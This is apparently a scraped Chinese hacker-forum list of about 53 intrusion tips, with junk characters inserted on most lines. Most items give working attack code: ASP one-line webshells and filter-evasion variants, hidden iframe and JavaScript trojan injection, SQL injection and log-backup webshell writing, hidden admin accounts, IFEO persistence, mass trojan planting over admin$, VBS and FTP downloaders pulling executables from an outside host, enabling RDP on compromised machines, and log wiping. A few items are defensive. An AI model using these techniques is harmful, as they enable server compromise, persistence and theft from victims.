1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
5 Y( A( v* n4 A9 D( E" e4 x) {cacls C:\windows\system32 /G hqw20:R
* n8 D: h, C# U: {3 i; M- N思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
, x- z" R( M4 O恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F1 m. i' N* |0 P: u5 @
' ? _! b1 X- N3 X7 @! n2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。, G' |' I3 ], [8 O4 B5 a" F
; q4 `# s) T9 i. j5 ]. Y* _
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。8 S% J9 J8 s- X0 u8 v
g! \* ~8 v7 }* F9 i& I4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
4 k7 a3 a$ {2 _4 r$ \# }5 v! x% W$ A4 h( g9 t
5、利用INF文件来修改注册表9 T% @6 Z$ g! V, X7 a/ b/ ?" |
[Version]
/ g' ]3 s: w+ pSignature="$CHICAGO$"
- b' H! P; H+ t6 m& p/ P6 e4 ^[Defaultinstall]0 k. M: G+ s; f1 d1 n; X
addREG=Ating; B1 k, ]0 c5 q( B# G" [0 ]. @
[Ating]
L. W9 y0 g' r! s0 w2 y* KHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1", v; R. e: h% P5 X: S
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
/ M" B/ K* m* Q; R6 P6 Orundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( Q1 ]% s2 k$ m8 ~" F, U, t+ i其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
$ ?6 z; p4 s2 }( x+ s% OHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% I. A7 b1 b3 i& f5 B- ~& t" jHKEY_CURRENT_CONFIG 简写为 HKCC$ B. v3 r: v3 P5 Y8 u( H
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值# F3 j9 m" c1 H6 }+ b3 b
"1"这里代表是写入或删除注册表键值中的具体数据
, i) Q/ d, R( _0 L$ M
9 X3 u# [- P5 g$ Y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,3 D, U( b" [. x/ F% X6 S
多了一步就是在防火墙里添加个端口,然后导出其键值
) y4 J# V) B& u. Z$ v5 f- a/ o7 n[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]9 x# V; a9 c R) N X9 y0 ?
7 f& X- J# }4 N R7 F) H7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽3 a( H2 V; `0 D9 Z* a' J1 L
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
8 ~. m; y9 N: h' `8 N5 \. @9 I1 D# R# ]% p1 @
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
# C" G" m$ |2 m3 o) w8 a0 N/ D$ H0 [- Q) Y
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,, ^& Q' W# d5 o! a8 Y8 x, z
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
6 j6 i) I7 Y m" t% ~
( A/ H, i! d- G$ q# X10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
3 m" Q1 [- L/ A) z/ Y7 ?
3 ^8 f% y4 w f, } x/ D4 b11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,, n9 Q* |0 t) E3 U a7 a' a
用法:xsniff –pass –hide –log pass.txt
' B2 o7 W: W: \; i6 u$ W6 d3 s, q0 R4 H" D
12、google搜索的艺术
, u2 u) Y! s) [0 p搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
1 y8 W; E1 S2 l# t: K或“字符串的语法错误”可以找到很多sql注入漏洞。. z" s9 ~% D; C0 `; y0 ^. y
. H" n) q1 n2 l; @& j
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。! z, T. G. w0 R8 A" a
. O ] G, t# x. r* w14、cmd中输入 nc –vv –l –p 1987
' v. { b$ g7 u. L8 c4 m做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃6 @7 m8 `# w* q! \
" ~2 f7 T0 _$ X% m5 H9 Q. Z
15、制作T++木马,先写个ating.hta文件,内容为
" O4 T J8 M ~* P t<script language="VBScript">% J+ n1 ]) m3 h! W. Z
set wshshell=createobject ("wscript.shell" )
j' o5 v, i7 \- \ q( ]a=wshshell.run("你马的名称",1)0 O' H; t; u0 B+ c( K4 K% B
window.close
% p# _6 [9 B9 c% k. K) k</script>
& s3 l* ]( Q& C# e9 |, m( [再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
/ F3 o* L% k+ b0 }0 ?) ~* I! _
' Z7 H+ n& a/ h: L( `( j* x; `16、搜索栏里输入+ `+ a0 g0 U6 N& t* ^
关键字%'and 1=1 and '%'='# ~; _# P$ i# H$ j$ n s, x
关键字%'and 1=2 and '%'='# H, q l+ W+ o" J& j) ]
比较不同处 可以作为注入的特征字符7 A3 k% K) k) A
( K2 R2 E4 ~! ?, `4 @
17、挂马代码<html>
O& O# Y6 c' U! K& G6 D<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 l8 D# u) C, E</html>
; ^) q0 O* Q. w( V2 Q4 G, u
/ l) _5 f9 ?( T$ u% h* h: p18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,! I6 `( e$ o1 c8 r
net localgroup administrators还是可以看出Guest是管理员来。
9 V' Y; J2 X. ^ l# p) U( M; q( ^9 @5 Y
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等/ I9 F# u5 q5 L6 B- y
用法: 安装: instsrv.exe 服务名称 路径1 o0 |& R: [0 p: U6 \
卸载: instsrv.exe 服务名称 REMOVE# N4 m4 H& Y! a) u4 h: z& U
! ]( G' X/ ~1 I: g+ \
& c4 V4 A3 H' M- p" d21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
' B: W/ a" c% I9 m8 R d5 c不能注入时要第一时间想到%5c暴库。
1 l7 |5 a3 ?1 N9 V- @% o* t5 S$ A; l2 r
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~0 M- Z9 F: v" o6 n
# w8 K8 J0 M) N8 g- f8 R
23、缺少xp_cmdshell时
0 z% d( A5 S& G6 W& S+ g+ ~* U" l3 V( P尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
/ Y5 d5 H- e, M假如恢复不成功,可以尝试直接加用户(针对开3389的)
2 @% f5 Z7 m; B0 h5 t! G, P/ _declare @o int m+ \0 F0 s) b3 l
exec sp_oacreate 'wscript.shell',@o out1 c( n! t2 Z8 o; R& v7 g& n
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员" N8 U4 ]5 R: @9 h$ L; }$ S
# z \9 ^' g) p9 X( b% `
24.批量种植木马.bat( i" E! X+ o7 ^4 Y( D. ?
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
& P& g5 W2 v# G# i+ Kfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
9 c! j5 l+ W1 E! Z扫描地址.txt里每个主机名一行 用\\开头
& T: y- n$ M# o; q6 t$ g) m* U: B/ {6 Y+ @- d9 P7 F
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
* C! ]0 i% c, V: e
4 f, `4 U/ P1 \5 p26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
, e7 m9 q3 E3 Q. o( X将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
" w/ D a! G$ {4 a0 @$ G.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% E- Y5 ~3 C/ q* ?0 b4 z3 z7 w+ U5 R0 {4 b
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP2 x0 g0 X/ c" v9 s- l
然后用#clear logg和#clear line vty *删除日志/ Q2 Z. h6 U) u
4 v( Q! Z2 B J4 M! R- r
28、电脑坏了省去重新安装系统的方法
5 L ?* P# N0 p1 |9 v纯dos下执行,
% x5 ]" s, R/ Y& P uxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
3 v3 J: c! [$ \" t) L9 V& ~2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config" v7 V( @2 Q' y) ?0 ]
' G: L' a9 O+ p& i
29、解决TCP/IP筛选 在注册表里有三处,分别是:+ o7 T; N! v& f$ c
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
. w$ v0 w- f. O; [( L+ vHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
0 @$ v) h' Z! WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ Y' p) k, \. [6 s( t3 h
分别用6 _3 t: \. |7 k
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! Y4 {7 D, F8 F5 B( T; C
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip1 C4 U; U; b+ k& e
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ o a( Q2 D, X
命令来导出注册表项" s. v" i8 k4 T! Q
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
E" \$ x: C3 j7 ?( S W6 M改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
" Q* I7 A: p( `2 M- `2 Jregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。6 e5 a4 h5 a S4 \
a/ O e$ B0 l0 ^: g30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
$ Q8 B2 g* \# K; oSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3; z# ?, s- {! x( m
8 q7 v' u Q0 P1 X) Q31、全手工打造开3389工具
! ]2 x& n' h+ e t1 M4 q4 A打开记事本,编辑内容如下:
' {# i! u: n9 ]/ ^& y; mecho [Components] > c:\sql
. C& K) k& b; a k3 q9 } o) V) eecho TSEnable = on >> c:\sql1 O8 l" [2 U; A$ U
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
& d7 H- n$ \9 ?! @' q) M3 p编辑好后存为BAT文件,上传至肉鸡,执行3 |1 [3 o7 M- p& Z1 J. H
. q2 j# d, T) [, `" D32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
9 h8 y% B' |: X. w* v+ n3 L n% F+ O0 _5 k# C; ^% h1 I# a
33、让服务器重启4 e4 t5 ?- d3 ?5 D. ?, s6 T
写个bat死循环:
. L0 V; w. ]% L' J@echo off& S; X5 x4 |- b9 u% w4 L
:loop1
7 n7 e& I3 j& C$ n3 J4 ?3 ucls
2 x& X- }+ s- ^3 D0 s* e9 Cstart cmd.exe
1 z1 A6 K9 d7 v( R6 g" Vgoto loop1
" {+ F- R, R, M+ o) f# t C保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! w% z& [, }3 k- y# S2 o
Q& [$ w0 _% z1 ~34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
' U& J A$ ]; q7 f3 [@echo off
$ Y# H" I1 Z( udate /t >c:/3389.txt
; a9 m3 L1 ~+ J8 ltime /t >>c:/3389.txt; O' o$ U! g: I$ V
attrib +s +h c:/3389.bat
5 { @4 s8 x6 B5 m7 ?' {attrib +s +h c:/3389.txt- m/ ^3 E0 @2 w- ?
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt; Q) k; H$ V4 I! k7 r1 l
并保存为3389.bat
" Z& ]/ S- |$ X( f打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- S* J# g ~6 I* w
: j. c L* r" G1 O35、有时候提不了权限的话,试试这个命令,在命令行里输入:8 l1 V8 d$ S, h. K. `8 V) k
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)+ ^+ l# I0 w; Z( U8 s; i& u
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。8 i& P+ \' ]% m4 Y
8 _) a- a1 _( W+ m/ H+ D, a+ W
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件, d2 X; @! J3 e7 x- G
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址8 }& N) h# N7 A3 H9 v
echo 你的FTP账号 >>c:\1.bat //输入账号- _4 s% |; L" E0 _1 l8 A: F
echo 你的FTP密码 >>c:\1.bat //输入密码4 q. u8 z* [1 l% T0 s
echo bin >>c:\1.bat //登入
; L$ p+ {6 _$ a( k9 [( becho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
" Z# Z: j+ R+ X* F; Zecho bye >>c:\1.bat //退出
; _7 P6 t" k8 B然后执行ftp -s:c:\1.bat即可; ^0 C+ Y- k% l
' s J' A- x- G8 F, A5 s5 B37、修改注册表开3389两法; J+ A. b& w0 q6 o2 _2 j' h
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
1 X! z- h$ D8 f7 u5 D, y0 `; h" ^echo Windows Registry Editor Version 5.00 >>3389.reg. q c7 b* a) R0 O1 j0 k' ~1 J
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg+ s# o3 h8 w; o T1 `, E+ w0 j
echo "Enabled"="0" >>3389.reg6 \9 s }) |- h0 Z9 n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
# C. [- v2 x# Y- O, n+ RNT\CurrentVersion\Winlogon] >>3389.reg9 @( X$ u, M, ]9 K- h( w" k
echo "ShutdownWithoutLogon"="0" >>3389.reg, L: v1 T6 I0 o" v) v
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]# [4 M3 ^2 p; ~! p& v
>>3389.reg0 K S' o+ G0 p5 D; h$ \
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg' ]0 Q1 k/ G; B
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
; N5 Z6 A9 \* E; ~8 _. v% G% Z$ z>>3389.reg
6 h" p, h$ j0 U1 [- Gecho "TSEnabled"=dword:00000001 >>3389.reg+ X! f4 C9 v' Q+ m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
" ]) }; l1 q" b7 Y) Secho "Start"=dword:00000002 >>3389.reg
3 C: l/ i% b$ e+ P1 q# K: aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService], X8 Y G) A' i: A: [' O& @
>>3389.reg
' s8 X! l7 I, p+ B: ~echo "Start"=dword:00000002 >>3389.reg. b5 ~ E( P4 _6 W
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
8 j- R! k& ^7 N- |4 I& A2 w0 ]8 iecho "Hotkey"="1" >>3389.reg8 r& X, [* o% _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal1 ]& G3 M8 `" m" N* c
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
6 Z: C6 [0 H, }/ Uecho "PortNumber"=dword:00000D3D >>3389.reg" ]! J$ n$ i; i! u5 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) w3 n% Y3 b3 m# c- k9 u! ^5 ]3 @
Server\WinStations\RDP-Tcp] >>3389.reg
8 _& ?6 x. k! r1 t# {echo "PortNumber"=dword:00000D3D >>3389.reg- { y9 F( @' w/ ^
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
0 M5 \: b3 r& ~(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
9 G! `0 c& r- H8 _ k ]因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效 m1 P- x( h% G. F: Z, Y6 m2 Y7 \6 j
(2)winxp和win2003终端开启 E! E+ @! C) r- {( s2 {1 e
用以下ECHO代码写一个REG文件:! Q! b4 _; Q$ v, S$ G/ g6 p
echo Windows Registry Editor Version 5.00>>3389.reg
& {9 m; M4 [1 u. Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 ^; d. B* |, b( |* v% j
Server]>>3389.reg
, a& \5 y; O7 z' Cecho "fDenyTSConnections"=dword:00000000>>3389.reg y3 x- D9 R2 Y' [, _
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal6 P- a6 g, ~" a( y) U8 u9 `
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
' ~ D, x" z& K! h" D9 ^9 x( W) Iecho "PortNumber"=dword:00000d3d>>3389.reg
' ^* N/ n; d9 Y% b4 }5 Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ z2 F c7 `8 a1 |Server\WinStations\RDP-Tcp]>>3389.reg* p1 p& P2 e3 k! [0 l& q( P5 q+ [5 c
echo "PortNumber"=dword:00000d3d>>3389.reg4 P3 f" e f: g+ |7 U, t+ ]# i
然后regedit /s 3389.reg del 3389.reg% R% y) @& a$ e: X
XP下不论开终端还是改终端端口都不需重启
) z: h' Q+ G0 B- \2 ?8 U5 t: \
7 E9 C, N& Q' R9 o, a2 H+ H38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃7 y# F" _- N. x' S+ i( F! t
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'3 v9 z9 F9 N+ G4 e# b
& Q1 Q5 m# W0 c! B' I' P8 p
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!, ?3 x: w- P* m, \' h7 f
(1)数据库文件名应复杂并要有特殊字符
' l( {* k6 x% T9 `, \: R: q(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! a6 h* u z6 D: w3 Y* S
将conn.asp文档中的
& D8 y- G$ P/ _DBPath = Server.MapPath("数据库.mdb")! A* }: s5 h3 d4 e( ]" \
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath5 I) u) a! C: o1 R G4 G
3 M6 h; k* N+ X; \' G) D9 n% ?6 y3 ~
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置7 R" X0 E6 O" w
(3)不放在WEB目录里+ B) t/ [6 R8 \8 Q% V7 h0 p# O: |
, {- I2 {% H; }: }0 T
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉3 C q3 W2 b) p" p
可以写两个bat文件
7 \3 A5 k! ~2 w0 g0 y* `5 i: v@echo off9 W9 B, {; G: Q1 {7 u9 Z6 k
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
* ?% k# L+ t5 C4 T1 y3 L8 n@del c:\winnt\system32\query.exe
, p0 |) Z4 f# Y/ S6 ?@del %SYSTEMROOT%\system32\dllcache\query.exe* \& a! E. w* o4 G: Z
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
% X% T8 H. z3 I+ \7 V$ U/ O
3 K h9 z% e4 _* U/ z# m@echo off- I8 F6 @& U! I3 s3 z2 H& ^# Y
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe! ~8 M# D3 a" s6 P/ A2 y! C
@del c:\winnt\system32\tsadmin.exe8 _1 v) \ \, a5 N; d3 n0 m
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex) D& \1 E. O, ], ~& p# M! V4 K7 _- z
5 v+ O' y7 K4 A4 t* `41、映射对方盘符
* S ?# S: l: i" G Etelnet到他的机器上,; W4 o o, J( `1 d
net share 查看有没有默认共享 如果没有,那么就接着运行
+ `. q1 ^& w. m9 }net share c$=c:
' Y- x" m9 H# I8 G8 Wnet share现在有c$1 s* o4 o& k8 }
在自己的机器上运行
3 }8 P, C, I$ W- |net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
0 `5 @0 C+ Q0 L) `- P S1 Q" s7 E% B9 P2 |) A, T
42、一些很有用的老知识: a) M. z, C, P* Z
type c:\boot.ini ( 查看系统版本 )( j. i4 @# P9 c/ c: M
net start (查看已经启动的服务)
' i% X1 j$ y* X: q S. Hquery user ( 查看当前终端连接 )
. Y) ]: s- G# r' M' Cnet user ( 查看当前用户 )
7 i b8 d. B* u2 qnet user 用户 密码/add ( 建立账号 )
1 e$ M# c+ ^/ `net localgroup administrators 用户 /add (提升某用户为管理员)
. t) m& O- [: r3 z: F X/ h3 Z) uipconfig -all ( 查看IP什么的 ). C2 |6 G3 g: T: o+ T3 J: Y8 s
netstat -an ( 查看当前网络状态 )
' M6 Q& M T! Q4 ^$ w" Ffindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码), Q, R, ` z# j6 r6 @5 S: S5 C6 I
克隆时Administrator对应1F4' M' ?2 P% {2 T0 S Q
guest对应1F5- F) H, u. R# B/ U ~3 |
tsinternetuser对应3E8
, {3 o3 ]3 G# U P, d6 _7 ]8 C! {# {9 j9 o: U! u$ ~
43、如果对方没开3389,但是装了Remote Administrator Service1 u5 E$ [' v3 P3 u/ p3 U
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接0 s7 s3 b9 R1 m2 Q
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息+ X( f% Q g3 ]+ b4 E, I0 h5 K
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) \+ K- {, `1 A. G) e# K0 ]4 e* n1 k# P7 Q) n" j' f
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
/ d8 ^2 }6 L# u$ @4 p' ?; n本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
9 f# T* o6 v" |. Y# O5 ] t
- w! x, r* C5 P45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
) Y' `9 Z1 u( K3 X. E" wecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open& S7 T, e T3 D
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
, k( f: H; I9 [/ Y% wCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =# ?: w1 V7 J7 @' K! F9 g
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs* o ^! p6 |! v5 ?7 d, X
(这是完整的一句话,其中没有换行符)2 M) x: E) c# J7 d M: P
然后下载:# `9 i( j" G. Q6 F
cscript down.vbs http://www.hack520.org/hack.exe hack.exe# u) r7 g* c8 h& W+ I
3 o' F! d7 I; z+ s46、一句话木马成功依赖于两个条件:
7 [' P) s5 {/ X( Y1、服务端没有禁止adodb.Stream或FSO组件# H+ i! H7 O. M. X
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。" H; {6 f9 A' t$ I6 O* g& r
* V! [ z$ o: \) y" J! O: ^
47、利用DB_OWNER权限进行手工备份一句话木马的代码:! P: \ Y3 S. k
;alter database utsz set RECOVERY FULL--
$ \& g i+ ? T/ ]5 G3 q/ w3 i;create table cmd (a image)--
h( D! X* d- ~+ e u0 K( y- s;backup log utsz to disk = 'D:\cmd' with init--# Z! M7 a, i2 x5 K) v
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
3 T& s6 j: j# N; @9 s;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
- d. T2 k3 K5 t注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。5 d. H! O/ k% T) @ F( N+ B
8 l$ C+ ?6 [' J Q
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
2 S# `* t" l. j. Z* f% ?2 W$ |( U2 Q( ^
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options) u( a0 i# ^0 K. i9 v, W2 s1 G
所有会话用 'all'。
2 R* k D* A# t9 z! h8 [-s sessionid 列出会话的信息。
. |2 Z6 t8 h: ?! o2 w" R/ Q-k sessionid 终止会话。- u# ?4 a( ~' z! r6 U- g0 O0 j
-m sessionid 发送消息到会话。 p9 ~0 s: @$ r
2 f, _) _6 f7 r+ B0 D7 y
config 配置 telnet 服务器参数。6 S2 n( H8 W4 T
h( t4 Z/ b6 n& u5 ^6 w$ U
common_options 为:
E2 L4 g' {' ~6 F5 s) ?-u user 指定要使用其凭据的用户" B% x f9 s: t4 n
-p password 用户密码$ |) N4 O, H, _" E0 U+ w
5 O n" I" H0 |( w& z9 F' yconfig_options 为:
" i. A* d* R* v" P0 u& W N) k" D, A) Kdom = domain 设定用户的默认域
0 K5 \" W1 H* A3 F: ^) u% R' yctrlakeymap = yes|no 设定 ALT 键的映射
; {2 v4 Y- c+ G2 e1 b! ctimeout = hh:mm:ss 设定空闲会话超时值5 q" z/ |* u+ B8 q
timeoutactive = yes|no 启用空闲会话。
) K% a& b3 c# Hmaxfail = attempts 设定断开前失败的登录企图数。
7 h' h' ?; V3 [2 m5 q- W9 } Dmaxconn = connections 设定最大连接数。
- q4 K4 I: {3 G) z8 Aport = number 设定 telnet 端口。! Z# C; {. b' s# w, U" x. q4 W
sec = [+/-]NTLM [+/-]passwd
0 k/ G3 r0 T8 U% n3 a7 C+ Q设定身份验证机构3 }3 e' r7 ~) A+ E5 v
fname = file 指定审计文件名。
u9 {) g; X7 M& Mfsize = size 指定审计文件的最大尺寸(MB)。, a" N7 I) R8 C$ g5 L* n% @2 K
mode = console|stream 指定操作模式。
! I# z& C- o7 B" H* [- U6 |auditlocation = eventlog|file|both8 {) I+ x# p1 b( B
指定记录地点. K# A1 D% o$ Q: }0 t) H
audit = [+/-]user [+/-]fail [+/-]admin
, w: U6 s. e7 i# R8 j3 t; b1 ?5 C3 ?, _5 v4 S/ l+ h
49、例如:在IE上访问:: n) Y7 D2 z+ k+ ]# M# C
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
! [( \$ H$ q4 \$ m* y3 Z X% ohack.txt里面的代码是:/ [ S" v. i4 s! @& h: h
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">3 q' ^# J) X7 O3 O: F* t
把这个hack.txt发到你空间就可以了!
# ?* c5 j2 |: |& A, I. s这个可以利用来做网马哦!% c5 e2 s8 L, a! n
0 M1 e! ^+ Y5 h( q, a
50、autorun的病毒可以通过手动限制!& t/ ?& P2 X) W+ k0 v
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!1 P$ {- r% h; U; M- ?0 {) _
2,打开盘符用右键打开!切忌双击盘符~
: s1 Z& V2 ~7 ]5 u- O Z$ m/ G% V3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!. k# \) q- B1 r
, N# T. E9 b' F% I51、log备份时的一句话木马:6 S% c9 j/ v: P6 j
a).<%%25Execute(request("go"))%%25>
7 z2 b' \& ~. `5 z2 @% [b).<%Execute(request("go"))%>4 F& X! ]' _7 w$ M
c).%><%execute request("go")%><%; n7 a+ q0 [! R. E4 ]
d).<script language=VBScript runat=server>execute request("sb")</Script>
. N8 X. E5 r1 k2 v3 T# o me).<%25Execute(request("l"))%25>, @8 S5 _/ x# ^
f).<%if request("cmd")<>"" then execute request("pass")%>
9 Q7 D+ r& j$ K" v) W' ?) y0 @3 F4 u6 U" u- g7 z
52、at "12:17" /interactive cmd
" u( x9 m" A( C7 t) x执行后可以用AT命令查看新加的任务, p5 b" p( a& e8 ]9 b' ~
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。( Y; q$ C. ]3 M
7 H! X$ r3 y4 u/ y4 N/ K, G2 W# J53、隐藏ASP后门的两种方法
